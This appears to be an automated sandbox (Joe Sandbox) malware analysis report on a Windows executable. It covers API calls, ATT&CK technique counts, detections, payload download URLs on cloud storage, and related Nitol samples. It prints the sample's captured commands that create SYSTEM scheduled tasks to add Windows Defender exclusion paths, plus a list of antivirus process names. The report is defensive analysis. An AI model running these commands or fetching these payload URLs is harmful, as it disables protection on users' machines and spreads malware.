Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00007FFDAC081F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 41_2_00712AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 41_2_007110CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 41_2_007151FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Code function: 42_2_001F10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Code function: 42_2_001F2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Code function: 42_2_001F51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Documents\EMp3o1.exe NtAllocateVirtualMemory: Indirect: 0x140006FD0
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe NtDelayExecution: Indirect: 0x1F94E4
Source: C:\Users\user\Documents\EMp3o1.exe NtProtectVirtualMemory: Indirect: 0x2A4B253
Source: C:\Users\user\Documents\EMp3o1.exe NtProtectVirtualMemory: Indirect: 0x2A2B253
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00007FFDAC08FD40 cpuid
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_000000014000F370 GetLocaleInfoA
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 41_2_00716B1A GetLocaleInfoA
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Code function: 42_2_001F6B1A GetLocaleInfoA
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: EMp3o1.exe, 00000005.00000002.2764651763.0000000002818000.00000002.00001000.00020000.00000000.sdmp Binary or memory strings: kxetray.exe, vsserv.exe, avcenter.exe, KSafeTray.exe, avp.exe, 360Safe.exe, 360tray.exe, rtvscan.exe, ashDisp.exe, TMBMSRV.exe, avgwdsvc.exe, AYAgent.aye, QUHLPSVC.EXE, RavMonD.exe, MsMpEng.exe, K7TSecurity.exe
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Command and Scripting Interpreter (112); Scheduled Task/Job (11); Service Execution (12); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Windows Service (33); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (33); Process Injection (11); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (32); Modify Registry (1); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (11)
Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); File and Directory Discovery (4); System Information Discovery (223); Security Software Discovery (231); Process Discovery (1); Virtualization/Sandbox Evasion (11); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Credential API Hooking (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
[Behavior graph: ID 1584369, Sample: 2b687482300.6345827638.08.exe, Startdate: 05/01/2025, Architecture: WINDOWS, Score: 100]

Source: 2b687482300.6345827638.08.exe; Detection: 12%; Scanner: Virustotal
Source: 2b687482300.6345827638.08.exe; Detection: 13%; Scanner: ReversingLabs

Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dll; Detection: 100%; Scanner: Avira; Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dll; Detection: 100%; Scanner: Avira; Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dll; Detection: 100%; Scanner: Joe Sandbox ML
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dll; Detection: 100%; Scanner: Joe Sandbox ML
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe; Detection: 0%; Scanner: ReversingLabs
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe; Detection: 0%; Scanner: ReversingLabs
Source: C:\Users\Public\Music\destopbak.ini; Detection: 0%; Scanner: ReversingLabs
Source: C:\Users\user\Documents\EMp3o1.exe; Detection: 0%; Scanner: ReversingLabs
No Antivirus matches
No Antivirus matches
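Name: sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com; IP: 118.178.60.9; Active: true; Malicious: false; Reputation: unknown
Name: sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com; IP: 39.103.20.34; Active: true; Malicious: false; Reputation: high
Name: 18.31.95.13.in-addr.arpa; IP: unknown; Active: unknown; Malicious: false; Reputation: high
Name: cvqthu.net; IP: unknown; Active: unknown; Malicious: false; Reputation: unknown
Name: msd1sq.oss-cn-beijing.aliyuncs.com; IP: unknown; Active: unknown; Malicious: false; Reputation: unknown
Name: 22mm.oss-cn-hangzhou.aliyuncs.com; IP: unknown; Active: unknown; Malicious: false; Reputation: unknown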
              NameMaliciousAntivirus DetectionReputation
              https://msd1sq.oss-cn-beijing.aliyuncs.com/a.giffalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/b.giffalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/i.datfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/c.giffalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/s.datfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/s.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://msd1sq.oss-cn-beijing.aliyuncs.com/d.giffalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
              • Avira URL Cloud: safe
              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifq | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifhttps://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifhttp | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifo | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/d.gifo | 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe.0.dr, 189atohci.sys.0.dr | false | | high
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifW | 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/w | 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/cps0( | 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe.0.dr | false | | high
https://msd1sq.oss-cn-beijing.aliyuncs.com/ | 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gifJ | 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gify | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gifA | 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe.0.dr, 189atohci.sys.0.dr | false | | high
http://www.symauth.com/rpa00 | 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe.0.dr | false | | high
https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifo | 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/i.dat: | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/d.giff | 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/a | 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.v | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.giftsg | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifW | 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
118.178.60.9 | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
39.103.20.34 | sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
8.217.47.169 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1584369
                        Start date and time:2025-01-05 10:09:45 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 52s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:48
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2b687482300.6345827638.08.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@65/29@12/3
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 88%
                        • Number of executed functions: 16
                        • Number of non-executed functions: 116
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 13.95.31.18, 20.109.210.53
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target G5CQjd.exe, PID 4548 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:11:39 | Task Scheduler | Run new task: lbo8Y path: C:\Users\user\Documents\EMp3o1.exe
10:12:13 | Task Scheduler | Run new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
10:12:50 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 mhBgH path: C:\Program Files (x86)\G5CQjd\G5CQjd.exe
10:12:52 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 N6cBd path: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
118.178.60.9 | 45631.exe | malicious | Nitol |
118.178.60.9 | 0000000000000000.exe | malicious | Nitol |
118.178.60.9 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 45631.exe | malicious | Nitol | 118.178.60.9
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 0000000000000000.exe | malicious | Nitol | 118.178.60.9
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol | 118.178.60.9
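Match | Associated Sample Name / URL | Detection | Threat Name | Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | armv7l.elf | malicious | Unknown | 8.212.89.249
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Josho.x86.elf | malicious | Unknown | 47.235.55.179
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | file.exe | malicious | XRed | 47.254.187.72
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | file.exe | malicious | XRed | 47.254.187.72
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml | malicious | HTMLPhisher | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 45631.exe | malicious | Nitol | 8.217.152.240
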